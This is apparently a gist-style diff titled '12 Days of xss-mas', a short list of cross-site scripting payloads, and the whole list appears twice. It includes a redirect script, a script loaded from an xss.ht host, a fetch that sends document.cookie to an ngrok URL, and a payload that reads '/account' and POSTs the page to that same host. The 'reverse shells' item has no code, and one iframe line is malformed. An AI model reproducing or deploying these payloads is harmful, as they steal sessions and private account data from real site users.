ruevaughn · June 20, 2021 20:24
diff --git a/12 Days of xss-mas b/12 Days of xss-mas
 1. A phising page to try and fool me
 <script>
 window.location='example.com'
 </script>


 2. two viral vids
 <script src=me2.xss.ht></script>
 document.body.innerHTML='<iframe src=https://youtube.com/embed/dQw4w9WgXcQ?autoplay=1allow=autoplay</iframe>
 </script>


 3. three stolen cookies 
 <script>
 fetch(`https://c48b9fbd76bf.ngrok.io?cookie=${encodeURIComponent(document.cookie)}`)
 </script>


 4.four protected pages
 <script>
 fetch('/account')
  .then(p => p.text())
  .then(t =>
    fetch('https://c48b9fbd76bf.ngrok.io',{
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({p:t})
    })
  )
 </script>



 5. five reverse shellls
	1. A phising page to try and fool me
	<script>
	window.location='example.com'
	</script>


	2. two viral vids
	<script src=me2.xss.ht></script>
	document.body.innerHTML='<iframe src=https://youtube.com/embed/dQw4w9WgXcQ?autoplay=1allow=autoplay</iframe>
	</script>


	3. three stolen cookies
	<script>
	fetch(`https://c48b9fbd76bf.ngrok.io?cookie=${encodeURIComponent(document.cookie)}`)
	</script>


	4.four protected pages
	<script>
	fetch('/account')
	.then(p => p.text())
	.then(t =>
	fetch('https://c48b9fbd76bf.ngrok.io',{
	method: 'POST',
	headers: { 'Content-Type': 'application/json' },
	body: JSON.stringify({p:t})
	})
	)
	</script>



	5. five reverse shellls